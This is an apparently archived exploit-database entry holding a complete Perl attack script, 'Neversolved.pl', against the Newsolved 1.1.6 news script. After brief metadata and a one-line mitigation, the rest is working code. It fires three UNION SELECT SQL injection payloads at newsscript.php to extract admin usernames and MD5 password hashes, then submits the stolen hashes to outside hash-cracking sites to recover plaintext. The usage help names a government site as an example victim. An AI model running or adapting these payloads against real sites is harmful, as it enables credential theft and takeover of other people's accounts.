Neversolved.pl

vendor:

Newsolved

by:

lama

6,5

CVSS

MEDIUM

N/A

CWE

Product Name: Newsolved

Affected Version From: 1.1.6

Affected Version To: 1.1.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Neversolved.pl is a simple login grabber by lama which is tested on Newsolved 1.1.6. It uses LWP::UserAgent to get the page and HTTP::Request to post the page. It uses Getopt::Std to get the options. It has three bugs which are used to get the user and password. It also has four lookups which are used to crack the MD5 hashes.

Mitigation:

Update to the latest version of Newsolved.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
# Neversolved.pl
#
# Copyright (c) 2009 by <jmp-esp.net>
#
# A simple login grabber
# by lama - 06/23/2009
#
# Tested on: Newsolved 1.1.6

use strict;
use LWP::UserAgent;
use Getopt::Std;
use vars qw/ %opt /;
getopts( "i:p:u:lfh", \%opt );

my @bugs =
(
    [
         "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
        ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
         "monat_num=1:(.*?):([a-f0-9]{32})"
    ],
    [
         "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
        ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
         "([^>]+):([a-f0-9]{32})<" 
    ],
    [
         "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
        ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
         "<i>(.*?):([a-f0-9]{32})<\/i>" 
    ]
);

my @lookups =
(
    [
        'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
        '',
        '<div id="result" >(.*?)</div>'
    ],
    [
        'http://milw0rm.com/cracker/search.php',
        'hash=[HASH]&Submit=Submit',
        '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
    ],
    [
        'http://securitystats.com/tools/hashcrack.php',
        'inputhash=[HASH]&type=MD5&Submit=Submit',
        '<BR>[a-f0-9]{32} = (.*?)</td>'
    ],
    [
        'http://md5decrypter.com/index.php',
        'hash=[HASH]&submit=Decrypt',
        '<b class=\'red\'>Normal Text: </b>(.*?)\n'
    ]
);

sub isHost
{
    my $target = shift;
    if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ )
    {
        my $host = $1;
        my $folder = ( $2 ? $2 : '/' );
        if ( $folder !~ /\/$/ ) 
        { 
            $folder .= '/';
        }
        return "http://$host$folder"; 
    }
    else
    { 
        return 0;
    }
}

sub replacePlaceholder
{
    my $search = shift;
    my $replace = shift;
    my $placeholder = shift;
    $search=~s/\[$placeholder\]/$replace/g; 
    return $search;
}

sub isVulnerable
{
    my $target = shift;
    my $ua = LWP::UserAgent->new;
    my $request = new HTTP::Request('GET', $target); 
    $request->header('User-Agent' => $opt{u});
    my $response = $ua->request($request);
    my $body = $response->content;
    if ($body =~ /mysql_fetch_object/)
    {
        return 1;
    }
    elsif (!($body =~ /styles_output\.css/))
    {
        return 0;    
    }
    else
    {
        return -1;
    }
}

sub getHash
{
    my $target = shift;
    my $regexp = shift;
    my $ua = LWP::UserAgent->new;
    my $request = new HTTP::Request('GET', $target); 
    $request->header('User-Agent' => $opt{u});
    my $response = $ua->request($request);
    my $body = $response->content;
    if ($body =~ /$regexp/)
    {
        return ($1, $2);
    }
    else
    {
        return 0;    
    }
}

sub searchPlaintext
{
    my $hash = shift;
    foreach (@lookups)
    {
        my $server = replacePlaceholder(@$_[0], $hash, "HASH");
        my $post = replacePlaceholder(@$_[1], $hash, "HASH");
        my $ua = LWP::UserAgent->new;
        my $request = new HTTP::Request('POST', $server); 
        $request->content("$post"); 
        $request->content_type('application/x-www-form-urlencoded');
        $request->header('Referer' => $server);
        $request->header('User-Agent' => $opt{u});
        my $response = $ua->request($request);
        my $body = $response->content;
        if ($body =~ /@$_[2]/)
        {
            return $1;
        }

    }
    return 0;
}

sub attackTarget
{
    my $target = shift;
    my $userid = shift;
    foreach (@bugs)
    {
        my $bug = @$_[0];
        $bug = replacePlaceholder($bug, $userid, "USERID");
        $bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
        (my $username, my $password) = getHash($target.$bug, @$_[1]);
        if (($username) && ($password))
        {
            return ($username, $password);
        }
    }
    return 0;
}

sub showHelp
{
    print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n"
        . "Usage: $0 [options] Victim\n"
        . "OPTIONS\n"
        . " -i integer: Userid [1]\n"
        . " -u string: Useragent [IE]\n"
        . " -p string: Prefix [newsolved]\n"
        . " -f: Force [optional]\n"
        . " -l: Lookup [optional]\n"
        . " -h: Help [optional]\n"
        . "EXAMPLES\n"
        . " ./$0 http://pentagon.gov/news/\n"
        . " ./$0 -f -i 4 http://omnomnom.com/\n"
        . "OTHER\n"
        . " Magic_Quotes_GPC needs to be off\n";
}

sub showBanner
{
    print "  __                                          \n"
        . " |__|.--------.-----.______.-----.-----.-----.\n"
        . " |  ||        |  _  |______|  -__|__ --|  _  |\n"
        . " |  ||__|__|__|   __|      |_____|_____|   __|\n"
        . "|___|         |__|    lama  06/23/2009 |__|   \n"
        . "Kampfgeschrei!\n\n";    
}

if ($opt{h})
{
    showHelp();
    exit;
}

my $victim = shift;
if (!($victim) || !($victim = isHost($victim)))
{
    showHelp();
    exit;    
}

$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
$opt{i} = '1' if (!$opt{i});
$opt{p} = 'newsolved' if (!$opt{p});

if (scalar(@bugs) < 1)
{
    print "Bugs or gtfo. Srsly.\n";
    exit;
}

my $vulnerability = isVulnerable($victim.$bugs[0][0]);
if ($vulnerability == 0)
{
    print "This doesn't look like Newsolved. Read the help, now.\n\n";
    showHelp();
    exit if (!$opt{f});
}
elsif ($vulnerability == -1)
{
    print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n";
    showHelp();
    exit if (!$opt{f});
}

showBanner();
(my $username, my $password) = attackTarget($victim, $opt{i});
if ($username)
{
    print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n";
    print "Username:\t$username\nPassword:\t$password\n";
    if ($opt{l})
    {
        my $cleartext = searchPlaintext($password);
        if ($cleartext)
        {
            print "Cleartext:\t$cleartext\n";
        }
        else
        {
            print "Cleartext:\tNot found\n";
        }
    }
}
else
{
    print "Unable to retrieve the password: Is the userid correct?\n";
}

# milw0rm.com [2009-06-29]